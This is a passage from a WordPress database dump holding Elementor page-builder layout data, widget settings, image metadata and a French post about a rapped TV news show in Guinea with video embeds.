et\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"700\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1747,565,'_elementor_version','0.4'),(1748,565,'_elementor_edit_mode','builder'),(1749,565,'_elementor_css','a:3:{s:4:\"time\";i:1508940338;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1751,566,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1752,566,'_elementor_version','0.4'),(1753,566,'_elementor_edit_mode','builder'),(1754,566,'_elementor_css','a:3:{s:4:\"time\";i:1508940372;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1756,380,'_elementor_edit_mode','builder'),(1757,380,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"],\"category_border_color\":\"#0099f4\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#0099f4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"r2ttirp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"900\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1758,567,'_elementor_edit_mode','builder'),(1759,567,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1760,380,'_elementor_version','0.4'),(1761,568,'_elementor_edit_mode','builder'),(1762,568,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"r2ttirp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"900\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1763,568,'_elementor_version','0.4'),(1765,383,'_elementor_edit_mode','builder'),(1766,383,'_elementor_data','[{\"id\":\"4q8fxni\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"norfumb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"akbi56c\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"5\"],\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"b0tgp49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8hnfvt3\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1767,569,'_elementor_edit_mode','builder'),(1768,569,'_elementor_data','[{\"id\":\"4q8fxni\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"norfumb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"akbi56c\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"b0tgp49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8hnfvt3\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1769,383,'_elementor_version','0.4'),(1771,570,'_elementor_edit_mode','builder'),(1772,570,'_elementor_data','[{\"id\":\"4q8fxni\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"norfumb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"akbi56c\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"5\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"b0tgp49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8hnfvt3\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1773,570,'_elementor_version','0.4'),(1774,570,'_elementor_css','a:3:{s:4:\"time\";i:1508941080;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1775,385,'_elementor_edit_mode','builder'),(1776,385,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"],\"category_border_color\":\"#d8af3c\",\"button_bg_color\":\"#e8c140\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0estdl\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1777,571,'_elementor_edit_mode','builder'),(1778,571,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1779,385,'_elementor_version','0.4'),(1780,572,'_elementor_edit_mode','builder'),(1781,572,'_elementor_data','[{\"id\":\"8vn8lyd\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"92huazt\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f3r65sd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"6\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"m3it1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0estdl\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1782,572,'_elementor_version','0.4'),(1784,359,'_elementor_edit_mode','builder'),(1787,359,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"17\"],\"category_border_color\":\"#ff1727\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#ff1727\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1788,574,'_elementor_edit_mode','builder'),(1789,574,'_elementor_css','a:4:{s:4:\"time\";i:1508941474;s:5:\"fonts\";a:0:{}s:6:\"status\";s:5:\"empty\";s:3:\"css\";s:0:\"\";}'),(1790,574,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1791,359,'_elementor_version','0.4'),(1792,575,'_elementor_edit_mode','builder'),(1793,575,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1794,575,'_elementor_version','0.4'),(1814,590,'_edit_last','1'),(1815,590,'_edit_lock','1509541435:1'),(1816,590,'_wp_page_template','default'),(1824,590,'post_views_count','167'),(1825,590,'_elementor_data','[{\"id\":\"illsald\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fohozhn\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ewfkmgd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>En Guin\\u00e9e, les t\\u00e9l\\u00e9spectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal t\\u00e9l\\u00e9vis\\u00e9 version \\u00ab rap \\u00bb, pr\\u00e9sent\\u00e9 par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins d\\u00e9cal\\u00e9, ces rappeurs abordent l\\u2019actualit\\u00e9 politique et sociale.<\\/p><h3>Regarder la 1 \\u00e8re \\u00e9mission\\u00a0 de ce journal: \\u00ab\\u00a0Un journal t\\u00e9l\\u00e9vis\\u00e9 rap\\u00e9 au Guin\\u00e9e \\u00bb<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"kkdnkwu\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"pwzz9kc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b49m4ie\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=6swruwk4x7g&t=8s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1828,594,'_elementor_edit_mode','builder'),(1829,594,'_elementor_data','[{\"id\":\"illsald\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fohozhn\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ewfkmgd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>En Guin\\u00e9e, les t\\u00e9l\\u00e9spectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal t\\u00e9l\\u00e9vis\\u00e9 version \\u00ab rap \\u00bb, pr\\u00e9sent\\u00e9 par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins d\\u00e9cal\\u00e9, ces rappeurs abordent l\\u2019actualit\\u00e9 politique et sociale.<\\/p><h3>Regarder la 1 \\u00e8re \\u00e9mission\\u00a0 de ce journal: \\u00ab\\u00a0Un journal t\\u00e9l\\u00e9vis\\u00e9 rap\\u00e9 au Guin\\u00e9e \\u00bb<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"kkdnkwu\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"pwzz9kc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b49m4ie\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=6swruwk4x7g&t=8s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1830,590,'_elementor_version','0.4'),(1831,590,'_elementor_css','a:3:{s:4:\"time\";i:1509015526;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1834,590,'_oembed_8d384d7be9e4729700a33f7a5b18680a','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/6swruwk4x7g?start=8&feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1835,590,'_oembed_time_8d384d7be9e4729700a33f7a5b18680a','1509541482'),(1838,597,'_elementor_edit_mode','builder'),(1839,597,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1840,597,'_elementor_version','0.4'),(1841,597,'_elementor_css','a:3:{s:4:\"time\";i:1508941695;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1842,598,'_elementor_edit_mode','builder'),(1843,598,'_elementor_data','[{\"id\":\"4jaadzu\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hh2f5p6\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fy6i0n0\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"17\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"sor3acf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"un464qr\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1844,598,'_elementor_version','0.4'),(1846,599,'_wp_attached_file','2017/10/JTR.jpg'),(1847,599,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:360;s:4:\"file\";s:15:\"2017/10/JTR.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"JTR-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"JTR-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1848,590,'_thumbnail_id','599'),(1856,601,'_elementor_edit_mode','builder'),(1857,601,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"uni